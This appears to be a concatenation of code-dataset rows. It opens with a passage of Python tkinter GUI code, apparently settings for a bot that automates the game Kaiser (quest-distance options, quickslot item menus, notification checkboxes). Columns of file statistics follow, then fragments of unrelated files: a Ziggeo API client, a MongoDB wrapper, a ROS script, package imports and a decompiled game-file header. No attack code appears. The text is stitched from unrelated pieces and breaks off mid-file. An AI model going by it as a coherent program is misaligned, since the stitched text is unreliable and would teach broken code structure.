frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 거리(m)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'].trace(
'w', lambda *args: self.callback_local_quest_distance_limit(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit')
)
combobox_list = []
for i in range(1, 11):
combobox_list.append(str(i * 10))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'] = 40
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance_limit'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'].trace(
'w', lambda *args: self.callback_local_quest_distance(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance')
)
combobox_list = []
for i in range(1, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'] = 60
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_distance'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'].trace(
'w', lambda *args: self.callback_local_quest_auto(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_auto'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("현상 수배 퀘스트 수락 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'].trace(
'w', lambda *args: self.callback_local_quest_wanted_number(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number')
)
combobox_list = []
for i in range(0, 4):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_wanted_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 작업 탭 중간
frame_m = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_label = ttk.LabelFrame(frame_m, text='퀵슬롯 등록')
frame_label_inner = ttk.LabelFrame(frame_label, text='퀵슬롯 번호')
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "⑨ ⑩ ⑪ ⑫"
)
label.pack()
frame.pack()
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "⑤ ⑥ ⑦ ⑧"
)
label.pack()
frame.pack()
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = "① ② ③ ④"
)
label.pack()
frame.pack()
frame_label_inner.pack(padx=5, pady=5)
for i in range(12):
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text(str(i + 1)+'.', width=3)
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)] = tkinter.StringVar(frame)
if i == 0:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '0'].trace(
'w', lambda *args: self.callback_work_slot_item_0(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '0'))
elif i == 1:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '1'].trace(
'w', lambda *args: self.callback_work_slot_item_1(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '1'))
elif i == 2:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '2'].trace(
'w', lambda *args: self.callback_work_slot_item_2(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '2'))
elif i == 3:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '3'].trace(
'w', lambda *args: self.callback_work_slot_item_3(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '3'))
elif i == 4:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '4'].trace(
'w', lambda *args: self.callback_work_slot_item_4(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '4'))
elif i == 5:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '5'].trace(
'w', lambda *args: self.callback_work_slot_item_5(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '5'))
elif i == 6:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '6'].trace(
'w', lambda *args: self.callback_work_slot_item_6(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '6'))
elif i == 7:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '7'].trace(
'w', lambda *args: self.callback_work_slot_item_7(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '7'))
elif i == 8:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '8'].trace(
'w', lambda *args: self.callback_work_slot_item_8(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '8'))
elif i == 9:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '9'].trace(
'w', lambda *args: self.callback_work_slot_item_9(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '9'))
elif i == 10:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '10'].trace(
'w', lambda *args: self.callback_work_slot_item_10(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '10'))
elif i == 11:
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '11'].trace(
'w', lambda *args: self.callback_work_slot_item_11(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + '11'))
combobox_list = LYBKaiser.slot_item_list
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i) in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)] = combobox_list[0]
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)],
state = "readonly",
height = 10,
width = 28,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'slot_item_' + str(i)])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 작업 탭 우측
frame_r = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 알림 탭 좌
frame_l = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_label = ttk.Frame(frame_l)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'].trace(
'w', lambda *args: self.callback_notify_quickslot_item_empty(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('퀵슬롯 등록 아이템 부족'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quickslot_item_empty'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'].trace(
'w', lambda *args: self.callback_notify_character_death(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('캐릭터 사망'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'character_death'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'].trace(
'w', lambda *args: self.callback_notify_local_quest_stop(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('지역 퀘스트 탐색 실패'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'local_quest_stop'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'].trace(
'w', lambda *args: self.callback_notify_quest_complete(args, lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete')
)
if not lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'] = True
check_box = ttk.Checkbutton(
master = frame,
text = self.get_option_text('퀘스트 완료'),
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_NOTIFY + 'quest_complete'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 알림 탭 중
frame_m = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 알림 탭 우
frame_r = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # 알림 탭 좌
# frame_l = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # 알림 탭 중
# frame_m = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# # 알림 탭 우
# frame_r = ttk.Frame(self.inner_frame_dic['notify_tab_frame'])
# frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# ------
self.option_dic['option_note'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.inner_frame_dic['options'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.set_game_option()
def callback_notify_quest_complete(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_local_quest_stop(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_character_death(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_notify_quickslot_item_empty(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_11(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_10(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_9(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_8(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_7(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_6(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_5(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_4(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_3(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_2(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_1(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_work_slot_item_0(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_set(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_potion_set(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_potion_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_hp(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_potion_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_wanted_number(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_auto(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_auto(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_distance_limit(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_distance(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_distance(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_local_quest_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_limit_count(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_auto_play_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_duration(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
def callback_main_quest_each_stringvar(self, args, option_name):
self.set_game_config(option_name, self.option_dic[option_name].get())
| 38.363718
| 138
| 0.729274
| 6,214
| 42,929
| 4.691181
| 0.052462
| 0.086927
| 0.086172
| 0.118487
| 0.908168
| 0.884772
| 0.873864
| 0.852698
| 0.8245
| 0.760145
| 0
| 0.010583
| 0.150341
| 42,929
| 1,118
| 139
| 38.398032
| 0.788239
| 0.068718
| 0
| 0.461071
| 0
| 0
| 0.093229
| 0.011113
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054745
| false
| 0
| 0.010949
| 0
| 0.088808
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0fbae7724e4c0d3495fddc386c1bcca666201d42
| 81
|
py
|
Python
|
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | 5
|
2019-09-25T01:09:07.000Z
|
2021-11-03T02:39:42.000Z
|
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | null | null | null |
macresources/__init__.py
|
elliotnunn/macresources
|
cc7c6aacec7d241c945d925c3a2473c3917ef4e0
|
[
"MIT"
] | null | null | null |
from .main import parse_rez_code, parse_file, make_rez_code, make_file, Resource
| 40.5
| 80
| 0.839506
| 14
| 81
| 4.428571
| 0.642857
| 0.225806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 1
| 81
| 81
| 0.849315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0fc8113b47d0e5a0ea88e1aadfb0ecad858b8e0d
| 584
|
py
|
Python
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 3
|
2018-07-17T16:38:17.000Z
|
2020-10-31T19:56:47.000Z
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 8
|
2015-08-20T15:59:13.000Z
|
2022-01-17T13:08:45.000Z
|
ZiggeoMetaProfiles.py
|
Ziggeo/ZiggeoPythonSdk
|
7c1e46bdd0649bdd58707747279da40783f14f8b
|
[
"Apache-2.0"
] | 7
|
2015-08-12T14:32:12.000Z
|
2019-10-30T05:26:51.000Z
|
class ZiggeoMetaProfiles:
def __init__(self, application):
self.__application = application
def create(self, data = None):
return self.__application.connect.postJSON('/v1/metaprofiles/', data)
def index(self, data = None):
return self.__application.connect.getJSON('/v1/metaprofiles/', data)
def get(self, token_or_key):
return self.__application.connect.getJSON('/v1/metaprofiles/' + token_or_key + '')
def delete(self, token_or_key):
return self.__application.connect.delete('/v1/metaprofiles/' + token_or_key + '')
| 32.444444
| 90
| 0.686644
| 67
| 584
| 5.656716
| 0.313433
| 0.237467
| 0.221636
| 0.295515
| 0.633245
| 0.543536
| 0.543536
| 0.221636
| 0
| 0
| 0
| 0.008403
| 0.184932
| 584
| 17
| 91
| 34.352941
| 0.787815
| 0
| 0
| 0
| 0
| 0
| 0.116638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0
| 0
| 0.363636
| 0.909091
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
ba06826c76f4926253180e42728340f9d8145222
| 169
|
py
|
Python
|
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
src/monga/find_one.py
|
rizoadev/monga
|
e5d0e4bb1a4f33dc96ca03f2e199faf411afc29f
|
[
"MIT"
] | null | null | null |
class FindOne:
def __init__(self, collection):
self.collection = collection
def call(self, query: dict):
return self.collection.find_one(query)
| 24.142857
| 46
| 0.674556
| 20
| 169
| 5.45
| 0.6
| 0.385321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 169
| 6
| 47
| 28.166667
| 0.838462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
ba1830c6f2cd75fbdec8d9ae635f781e6606c413
| 42
|
py
|
Python
|
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
__init__.py
|
JulienMaille/segmentation_models.pytorch
|
4b18a48c14e05fe33ab13bd473195ef151d76e5e
|
[
"MIT"
] | null | null | null |
from .segmentation_models_pytorch import *
| 42
| 42
| 0.880952
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ba19f4ec97772213e352c73762114f9b65f1a9dc
| 133
|
py
|
Python
|
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
faa_computer_admin/src/faa_computer_admin/faa_control.py
|
njmei/fly-alcohol-assay
|
a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import roslib
roslib.load_manifest('faa_computer_admin')
from faa_computer_admin import control
control.cli()
| 19
| 42
| 0.819549
| 20
| 133
| 5.2
| 0.7
| 0.211538
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082707
| 133
| 6
| 43
| 22.166667
| 0.852459
| 0.150376
| 0
| 0
| 0
| 0
| 0.162162
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
ba21acedda3a2f065fdcb947043df9af2b090507
| 45
|
py
|
Python
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 111
|
2020-08-31T04:58:54.000Z
|
2022-03-29T15:44:18.000Z
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 14
|
2020-12-16T07:27:22.000Z
|
2022-03-15T17:39:01.000Z
|
malaya_speech/train/model/uis_rnn/__init__.py
|
ishine/malaya-speech
|
fd34afc7107af1656dff4b3201fa51dda54fde18
|
[
"MIT"
] | 29
|
2021-02-09T08:57:15.000Z
|
2022-03-12T14:09:19.000Z
|
from . import utils
from .model import Model
| 15
| 24
| 0.777778
| 7
| 45
| 5
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 25
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ba2fa0d9fb09fb1f7d3915ca9b8bb070a94485e2
| 6,145
|
py
|
Python
|
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3
|
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/shipNavyMerchant1.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1
|
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.shipNavyMerchant1
from pandac.PandaModules import Point3, VBase3, Vec4
